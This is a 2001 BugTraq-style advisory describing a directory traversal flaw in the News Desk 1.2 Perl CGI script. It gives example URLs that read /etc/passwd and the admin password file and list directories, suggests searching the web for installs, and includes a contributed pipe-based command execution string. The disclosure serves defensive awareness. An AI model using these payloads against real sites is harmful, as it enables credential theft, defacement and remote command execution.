Advisories : News Desk 1.2 CGI Vulnerability

main menu

- feedback
- advertising
- privacy
- FightAIDS
- newsletter
- news

discussions

- read forum
- new topic
- search

meetings

- meetings list
- recent additions
- add your info

top 100 sites

- visit top sites
- sign up now
- members

webmasters

- add your url
- add domain
- search box
- link to us

projects

- our projects
- free email

m4d network

- security software
- secureroot
- m4d.com

Home : Advisories : News Desk 1.2 CGI Vulnerability

Title:	News Desk 1.2 CGI Vulnerability
Released by:	slipy@b10z.net
Date:	3rd January 2001
Printable version:	Click here

Introduction:



News Desk 1.2 (newsdesk.cgi) is a news 

submission script which is written in perl and allows 

someone on a remote computer to connect to the 

server and post news submissions without logging 

into the actual server. By logging into the cgi with a 

custom login and password (pass.txt) the admin is 

able to post the latest headline news to his/her 

website with ease.





The Vendors website is:

http://www.ibrow.com



Problem: 



Adding the string "/../" to an URL allows an attacker to 

view any file on the server, and also list directories 

within the server which the owner of the vulnerable 

httpd has permissions to access.



Examples:



http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?

t=../../../../etc/passwd 

^^ = Will obviously open the passwd file, if 

unshadowed.



http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?

t=../pass.txt 

^^ = Will open the password string which can be used 

to login to the newsdesk.cgi and post new news, or 

with special variables the ability to upload/post html to 

the htdoc's directory, possibly leading to a 

defacement of the webpage.



http://www.VULNERABLE.com/cgi-bin/newsdesk.cgi?

t=../../../../etc/

^^ = Will obviously list the /etc/ directory. Not all 

servers will list directories, but most apear to.





Note: It depends on where they install newsdesk.cgi, 

not always in a cgi-bin, so it could be installed with 

any path. Just goto your favorite search engine and 

search for newsdesk.cgi and voila. There is also 

some other variants of this cgi script out there, most 

of them are noticeable by the news.cgi?

a=something&t=meow.html format. Notice the a= & 

t= which is a clear give-away to Newsdesk.







Solution:



Vendor has been contacted. And will release a 

updated version which is supposed to be more 

secure...





Special Thanks to:

zenomorph <http://www.cgisecurity.com>



Which contributed this:



Remote command execution is possible on most 

sites if you use the correct directory syntax such 

as ../../../bin/ls%20/| is a working example, many 

more commands are possible if you play around with 

it a bit, such as spawning xterms.



--------------------

Found By:



b10z cgi advisory.

slipy@b10z.net



Found on December 10th, 2000.

Posted to BugTraq Jan 3rd, 2001.